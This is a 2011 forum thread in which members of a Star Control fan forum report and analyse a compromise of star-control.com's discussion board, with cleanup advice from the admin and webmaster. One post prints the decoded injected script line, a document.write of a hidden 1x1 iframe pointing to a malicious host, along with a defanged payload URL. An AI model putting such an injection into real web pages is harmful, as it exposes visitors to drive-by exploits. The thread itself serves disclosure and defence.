The Ur-Quan Masters Home Page Welcome, Guest. Please login or register.
Did you miss your activation email?
July 07, 2020, 06:16:38 pm
Home Help Search Login Register
News: Paul & Fred have reached a settlement with Stardock!

+  The Ur-Quan Masters Discussion Forum
|-+  The Ur-Quan Masters Re-Release
| |-+  General UQM Discussion (Moderator: Death 999)
| | |-+  Star-control.com discussion board compromised
« previous next »
Pages: [1] 2 Print
Author Topic: Star-control.com discussion board compromised  (Read 6714 times)
Megagun
Enlightened
*****
Offline Offline

Gender: Male
Posts: 580


Moo


View Profile
Star-control.com discussion board compromised
« on: August 01, 2011, 06:17:03 pm »

It has come to my attention that the Star Control Discussion Board hosted on star-control.com has been compromised, and an iFrame has been injected that points towards locumresources.com

I advise you all to not visit the SCDB (and star-control.com) right now. It appears that the following bit of javascript will be executed if you do: http://pastebin.com/csA3wBAe

I'll look into this further to see what exactly is happening.

EDIT1:
seems like the following bit of code injects the iframe:
http://pastebin.com/xqN1Adqu
This produces the following string:
Code:
document.write('<iframe src="http://locumresources.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')
don't visit this locumresources.com URL using your browser
This string is then eval'd, which will embed the iframe.

When your browser goes to locumresources.com, it fetches a page with a lot of random numbers, and the following bit of JavaScript:
http://pastebin.com/x5D2RwKE

Once executed, this bit of JavaScript produces the following:
http://pastebin.com/csA3wBAe

I'm currently decompiling the worms.jar file to see what it does.

EDIT 2:
A VirusTotal report on http : // locum resources .com /k.php ?f=20 &e=2     (one of the URLs referred to in the JavaScript mess. Spaces added to protect the innocent. Do not visit this URL if you're not sure what you're doing!)
http://www.virustotal.com/file-scan/report.html?id=37e7b90d821bb14a45129c121510395547a2d1df8f4e262c7a1183e0c90e32d5-1312203813
« Last Edit: August 01, 2011, 06:47:53 pm by Megagun » Logged
Dabir
*Smell* controller
****
Offline Offline

Posts: 291



View Profile
Re: Star-control.com discussion board compromised
« Reply #1 on: August 01, 2011, 07:33:45 pm »

Well damn I just visited it. I visit it first. I didn't see any iframes, but the fonts were bugged up and php.bb was issuing debug notices complaining about headers having already been sent at the top. I'd go back and check, but right now I must scan my computer.
Logged
Nuclear
Zebranky food
*
Offline Offline

Gender: Male
Posts: 17


Pick up that can....


View Profile
Re: Star-control.com discussion board compromised
« Reply #2 on: August 01, 2011, 08:55:34 pm »

Same here, it was pretty natural for me to visit Star-Control.com first  Sad

Are those actual error codes? By the look of the pages source, they might have just been typed out.
Logged

Androsynth eat humans for breakfast. "Needs some salt," nuff said. Combine eat Androsynth for breakfast. "Will 5 bucks pay the bill?"
Draxas
Enlightened
*****
Offline Offline

Gender: Male
Posts: 1044



View Profile
Re: Star-control.com discussion board compromised
« Reply #3 on: August 01, 2011, 09:22:21 pm »

Was wondering what was going on when I got all those broken script notices earlier. I also found that all the links to subforums were dead, and also kicking back broken script messages. I had no idea this had something to do with an attack site.

Well, it's my PC at work, so there's nothing I can do for it. If the virus and spyware protection here can't catch it, I'm pretty much stuck.

Let us know when this gets resolved.
Logged
chenjesuwizard
*Many bubbles*
***
Offline Offline

Posts: 158


I support Project6014


View Profile
Re: Star-control.com discussion board compromised
« Reply #4 on: August 02, 2011, 12:49:37 am »

I'm scanning my computer and I ran Rkill. Rkill picked up something called Reminder.exe. It was in C:/Program Files/TTG/Reminder.exe. (That may be slightly wrong, it's from memory). I deleted that file and hope it's that, not something else.
Logged

Friendship is like peeing on yourself: everyone can see it, but only you get the warm feeling that it brings.
oldlaptop
*Smell* controller
****
Offline Offline

Posts: 337



View Profile
Re: Star-control.com discussion board compromised
« Reply #5 on: August 02, 2011, 03:39:08 am »

The SCDB front page looks clean to me now (some innocuous looking javascript probably generated by the forum software, no references to locumresouces.com anywhere), but the boards are still down. All links other than 'Board Index' and the board logo bring up an error that './cache is not writable', so I'd guess that databases have been taken down for checking.
Logged

Play Supermelee online in #uqm-arena!
Netmelee Improvement Mod
Admiral Zeratul
*Many bubbles*
***
Offline Offline

Gender: Male
Posts: 223


I enjoy overthinking things.


View Profile
Re: Star-control.com discussion board compromised
« Reply #6 on: August 02, 2011, 05:02:26 am »

I've also seen two spam threads on this forum recently. Could it be related somehow?
Logged

Priority override. New behavior dictated. Must break post into component ideas.
oldlaptop
*Smell* controller
****
Offline Offline

Posts: 337



View Profile
Re: Star-control.com discussion board compromised
« Reply #7 on: August 02, 2011, 05:49:10 am »

SCDB is back up.
Logged

Play Supermelee online in #uqm-arena!
Netmelee Improvement Mod
Angelfish
Enlightened
*****
Offline Offline

Posts: 568



View Profile
Re: Star-control.com discussion board compromised
« Reply #8 on: August 02, 2011, 08:27:24 am »

SCDB is back up.

That's dangerous to say.
But can we visit it without risk of getting infected?
Yesterday at home it caused various virus mentions.
Logged
Megagun
Enlightened
*****
Offline Offline

Gender: Male
Posts: 580


Moo


View Profile
Re: Star-control.com discussion board compromised
« Reply #9 on: August 02, 2011, 02:37:34 pm »

It's gone now, yes. I checked with Firefox and NoScript enabled. The bit that inserts the iframe is gone now.

However, it could be that whoever inserted that iframe has removed it himself, perhaps because he has succeeded in his goal (steal an Admin account so that he now has access to the database/php scripts?). Unless some SCDB Admin comes forward and tells us that he's removed the offending bit of javascript, I wouldn't trust the SCDB.
Logged
Draxas
Enlightened
*****
Offline Offline

Gender: Male
Posts: 1044



View Profile
Re: Star-control.com discussion board compromised
« Reply #10 on: August 02, 2011, 04:02:57 pm »

I'm guessing Luki would be the most likely to show up here. Until he (or Chad, or whoever) shows up, I guess I'll keep away for a while.
Logged
Anthony
*Smell* controller
****
Offline Offline

Gender: Male
Posts: 358


Star Control Lives!


View Profile WWW
Re: Star-control.com discussion board compromised
« Reply #11 on: August 02, 2011, 06:38:53 pm »

At least the code was removed.  I got ESET on my computers and the sites got blocked and it even alerted me when I looked at the code in pastebin.



The virus info from the ESET website said it's an exploit that can run "arbitrary code" on the user's PC - http://www.eset.eu/encyclopaedia/js-exploit-javadepkit-a-java-cve-2010-0886-a-javaws-bloodhound-292?lng=en

Hopefully, nobody lost anything or got their PC infected.
Logged

meep-eep
Forum Admin
Enlightened
*****
Offline Offline

Posts: 2847



View Profile
Re: Star-control.com discussion board compromised
« Reply #12 on: August 02, 2011, 07:12:47 pm »

My observations and conclusions:
  • Judging by the error messages, code was inserted in the PHP page source.
  • That means that someone had system access on the server.
  • Because the page was broken, and the contents which was included, it's likely that this was an automated attack.
  • This may make it less likely that any specific data has been stolen.
  • Change your password regardless.
  • From what I could find on possible candidates for this malware, compromised websites actually try to exploit the visitors' systems through various vulnerabilities in their software (mostly browser plugins).

My advise:
  • Keep your software up-to-date with respect to security updates! In particularly your operating system (Windows), Browser, and browser plugins (Java, Flash Player, PDF reader). Install Secunia PSI to help you with this. (It's free.)
  • (Windows) Have a virus scanner active.
  • Change your password for star-control.com, and on any place where you use the same password.
  • (Don't use the same passwords on important sites, and use a strong password.)
  • Avoid mainstream software, which is what is targeted through automated exploits. Use alternative PDF readers rather than Adone Reader. (Foxit Reader, PDF-XChange Viewer, ...), other browsers than Internet Explorer and Firefox, perhaps even your operating system (Linux or MacOS instead of Windows).
  • Don't have software installed which you don't use, in particular anything which acts as a server or plugs into your browser.
  • Make regular back-ups.

Also, the spam on the UQM forum is just that, spam. Annoying, but relatively harmless. This happens quite frequently and is usually removed quickly enough.

Disclaimer: While IT security is what I do professionally; I have not thoroughly investigated this attack. YMMV.
« Last Edit: August 02, 2011, 07:14:30 pm by meep-eep » Logged

“When Juffo-Wup is complete
when at last there is no Void, no Non
when the Creators return
then we can finally rest.”
Lukipela
Enlightened
*****
Offline Offline

Gender: Male
Posts: 3619


The Ancient One


View Profile
Re: Star-control.com discussion board compromised
« Reply #13 on: August 02, 2011, 07:56:28 pm »

Just back from non-internet land and something like this is here to spoil my day. All I know is that the site was indeed hacked and that Chad thinks he has fixed it. I've paged him to this thread, so hopefully he'll be able to clarify things more thoroughly than me. All I know is that he has locked down most things, I've no longer got FTP access to the site.
Logged

What's up doc?
Chad
*Many bubbles*
***
Offline Offline

Gender: Male
Posts: 201


PNF Webmaster


View Profile WWW
Re: Star-control.com discussion board compromised
« Reply #14 on: August 02, 2011, 09:00:10 pm »

Megagun, thank you for letting everyone know.

Yes, when I got home on 8/1, I noticed exploit warnings being flagged by my virus scanner while using my browser.

Then I figured it out it was coming from the browser tab running SCDB.

I'm fairly certain the compromise happened on 8/1 and I was done cleaning it up on 8/1.  I spent several hours analyzing and restoring.

I removed ftp access and changed account password(s).

It looks like something got in and changed index.* and login.* throughout all directories to contain the malicious code.  It seems automated.

I went through every single directory and restored the indexes from backup and then re-downloaded the entire contents of the site and virus scanned it again to make sure the files no longer had any malicious code.

I have no idea how they got in and if anyone has any ideas on how to figure that out, I'd love the help.

Sorry for any trouble, stuff like this just sucks.
Logged

"...Dogar And Kazon Clack Their Mandibles Against One Another And Snicker With Amusement."
Pages: [1] 2 Print 
« previous next »
Jump to:  


Login with username, password and session length

Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2015, Simple Machines Valid XHTML 1.0! Valid CSS!